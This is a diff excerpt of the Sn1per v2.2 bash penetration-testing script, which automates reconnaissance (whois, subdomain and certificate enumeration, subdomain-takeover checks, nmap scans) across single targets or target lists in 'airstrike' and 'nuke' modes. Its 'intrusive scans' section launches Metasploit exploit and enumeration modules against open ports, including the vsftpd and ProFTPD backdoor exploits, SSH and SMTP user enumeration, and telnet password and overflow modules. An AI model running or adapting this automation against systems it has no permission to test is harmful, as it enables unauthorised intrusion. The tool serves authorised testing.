+		python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+		dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+		echo ""
+		echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
+		echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
+		echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
+		echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
+		echo -e "$OKBLUE"
+		curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
+		echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
+		cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null	
+		cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null	
+		sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
+		rm -f /tmp/curl.out 2> /dev/null	
+		echo -e "$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
+		for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus" 2>/dev/null; done;
+		echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
+		python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+	fi
+	echo ""
+	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
+	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
+	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	
+	port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+	port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+	
+	if [ -z "$port_80" ];
+	then
+		echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
+	else
+		echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+		wafw00f http://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+		whatweb http://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+		xsstracer $TARGET 80
+		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+		cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
+	fi
+	
+	if [ -z "$port_443" ];
+	then
+		echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
+	else
+		echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+		wafw00f https://$TARGET 
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+		whatweb https://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+		xsstracer $TARGET 443
+		echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
+		sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
+		sslscan --no-failed $TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+		cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
+		echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$TARGET-port443.jpg"
+	fi
+	
+	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
+	exit
+fi
+
+if [ "$MODE" = "airstrike" ]; then
+	if [ "$OPT1" = "report" ]; then
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		exit
+	fi
+	echo -e "$OKRED                ____               $RESET"
+	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+	echo -e "$OKRED               /_/                 $RESET"
+	echo -e "$RESET"
+	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
+
+	for a in `cat $TARGET`;
+	do
+		echo -e "$OKRED                                         |"
+		echo -e "$OKRED                  |                      |"
+		echo -e "$OKRED                  |                    -/_\-"
+		echo -e "$OKRED                -/_\-   ______________(/ . \)______________"
+		echo -e "$OKRED   ____________(/ . \)_____________    \___/     <>"
+		echo -e "$OKRED   <>           \___/      <>    <>"
+		echo -e "$OKRED "
+		echo -e "$OKRED      ||"
+		echo -e "$OKRED      <>"
+		echo -e "$OKRED                            ||"
+		echo -e "$OKRED                            <>"
+		echo -e "$OKRED                                       ||"
+		echo -e "$OKRED                                       ||            BIG"
+		echo -e "$OKRED        _____               __         <>      (^)))^ BOOM!"
+		echo -e "$OKRED  BOOM!/((  )\       BOOM!((  )))            (     ( )"
+		echo -e "$OKRED ---- (__()__))          (() ) ))           (  (  (   )"
+		echo -e "$OKRED     ||  |||____|------    \  (/   ___     (__\     /__)"
+		echo -e "$OKRED      |__|||  |     |---|---|||___|   |___-----|||||"
+		echo -e "$OKRED  |  ||.  |   |       |     |||                |||||"
+		echo -e "$OKRED      |__|||  |     |---|---|||___|   |___-----|||||"
+		echo -e "$OKRED  |  ||.  |   |       |     |||                |||||"
+		echo -e "$OKRED __________________________________________________________"
+		echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)"
+		echo -e "$RESET" 
+		echo -e "$OKORANGE + -- --=[Launching airstrike: $a $RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
+		nslookup $a
+		host $a
+		
+		if [[ ${a:0:1} =~ $REGEX ]]; 
+		then 
+			SCAN_TYPE="IP"
+		else 
+			SCAN_TYPE="DOMAIN"
+		fi
+		
+		if [ $SCAN_TYPE == "DOMAIN" ];
+		then
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
+			whois $a
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
+			theharvester -d $a -l 100 -b bing 2> /dev/null
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
+			dig -x $a
+			dnsenum $a
+			mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
+			python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
+			dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
+			echo ""
+			echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
+			echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
+			echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
+			echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
+			echo -e "$OKBLUE"
+			curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
+			echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$a-full.txt"
+			cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null	
+			cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null	
+			sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
+			rm -f /tmp/curl.out 2> /dev/null	
+			echo -e "$RESET"
+			echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
+			for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
+			echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
+			python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
+		fi
+		echo ""
+		echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
+		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
+		
+		port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
+		port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
+		
+		if [ -z "$port_80" ];
+		then
+			echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
+		else
+			echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
+			echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+			wafw00f http://$a 
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+			whatweb http://$a
+			echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+			xsstracer $a 80
+			echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+			cutycapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg
+		fi
+		
+		if [ -z "$port_443" ];
+		then
+			echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
+		else
+			echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
+			echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+			wafw00f https://$a 
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+			whatweb https://$a
+			echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET"
+			xsstracer $a 443
+			echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
+			sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a
+			sslscan --no-failed $a
+			echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+			cutycapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg
+			echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$a-port443.jpg"
+		fi
+		
+		echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+	done;
+	exit
+fi
+
+if [ "$MODE" = "fullportonly" ]; then
+	echo -e "$OKRED    ___     ____              __            __    $RESET"
+	echo -e "$OKRED   / _/_ __/ / /__  ___  ____/ /____  ___  / /_ __$RESET"
+	echo -e "$OKRED  / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET"
+	echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/  \__/\___/_//_/_/\_, / $RESET"
+	echo -e "$OKRED            /_/                            /___/  $RESET"
+	echo -e "$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
+	if [ -z "$OPT1" ]; then
+		nmap -T4 -sV -O -v -p 1-65535 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	else 
+		nmap -T4 -sV -O -v -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	fi
+	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
+	exit
+fi
+
+if [ "$MODE" = "port" ]; then
+	if [ -z "$OPT1" ]; then
+		echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
+		exit
+	fi
+fi
+
+if [ "$MODE" = "nuke" ]; then
+	if [ "$OPT1" = "report" ]; then
+		sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
+		exit
+	fi
+	for a in `cat $TARGET`; do
+		echo -e "$OKRED "
+		echo -e "$OKRED                              ____"
+		echo -e "$OKRED                      __,-~~/~    \`---."
+		echo -e "$OKRED                    _/_,---(      ,    )"
+		echo -e "$OKRED                __ /        <    /   )  \___"
+		echo -e "$OKRED - ------===;;;'====------------------===;;;===----- -  -"
+		echo -e "$OKRED                   \/  ~'~'~'~'~'~\~'~)~'/"
+		echo -e "$OKRED                   (_ (   \  (     >    \)"
+		echo -e "$OKRED                    \_( _ <         >_>'"
+		echo -e "$OKRED                       ~ \`-i' ::>|--\""
+		echo -e "$OKRED                           I;|.|.|"
+		echo -e "$OKRED                          <|i::|i|\`."
+		echo -e "$OKRED                        (\` ^''\`-' ')"
+		echo -e "$OKRED --------------------------------------------------------- $RESET"
+		echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
+		sniper $a
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+		echo -e ""
+	done
+	exit
+fi
+
+echo -e "$OKRED                ____               $RESET"
+echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+echo -e "$OKRED               /_/                 $RESET"
+echo -e "$RESET"
+echo -e "$OKORANGE + -- --=[http://crowdshield.com"
+echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
+echo -e "$RESET"
+echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
+nslookup $TARGET
+host $TARGET
+echo -e "$OKGREEN + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +$RESET"
+xprobe2 $TARGET
+if [ $SCAN_TYPE == "DOMAIN" ];
+then
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
+	whois $TARGET
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
+	theharvester -d $TARGET -l 100 -b bing 2> /dev/null
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
+	dig -x $TARGET
+	dnsenum $TARGET
+	mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
+	python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+	dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+	echo ""
+	echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
+	echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
+	echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
+	echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
+	echo -e "$OKBLUE"
+	curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
+	echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
+	cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null	
+	cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null	
+	sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
+	rm -f /tmp/curl.out 2> /dev/null	
+	echo -e "$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
+	for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
+	echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
+	python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+fi
+echo ""
+echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
+ping -c 1 $TARGET
+echo ""
+echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
+if [ -z "$OPT1" ]; then
+	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
+	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+elif [ "$OPT1" == "web" ]; then
+	nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+else
+	nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
+	nmap -sU -T5 -p U:$OPT1 --open $TARGET
+fi
+
+service postgresql start
+
+echo ""
+echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET"
+port_21=`grep 'portid="21"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_22=`grep 'portid="22"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_23=`grep 'portid="23"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_25=`grep 'portid="25"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_53=`grep 'portid="53"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_79=`grep 'portid="79"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_389=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+
+if [ -z "$port_21" ];
+then
+	echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"	
+	nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
+	msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
+fi
+
+if [ -z "$port_22" ];
+then
+	echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
+	cd $PLUGINS_DIR/ssh-audit
+	python ssh-audit.py $TARGET:22
+	cd $INSTALL_DIR
+	nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
+	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
+fi
+
+if [ -z "$port_23" ];
+then
+	echo -e "$OKRED + -- --=[Port 23 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
+	echo ""
+	cisco-torch -A $TARGET
+	nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
+	msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
+fi
+
+if [ -z "$port_25" ];
+then
+	echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
+	smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
+	msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" 
+fi
+
+if [ -z "$port_53" ];
+then
+	echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
+	nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET	
+fi
+
+if [ -z "$port_79" ];
+then
+	echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=finger* -p 79 $TARGET
+	bin/fingertool.sh $TARGET $USER_FILE
+fi
+
+if [ -z "$port_80" ];
+then
+	echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+	wafw00f http://$TARGET
+	echo ""
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+	whatweb http://$TARGET
+	xsstracer $TARGET 80
+	echo ""
+	echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
+	echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10
+	echo ""
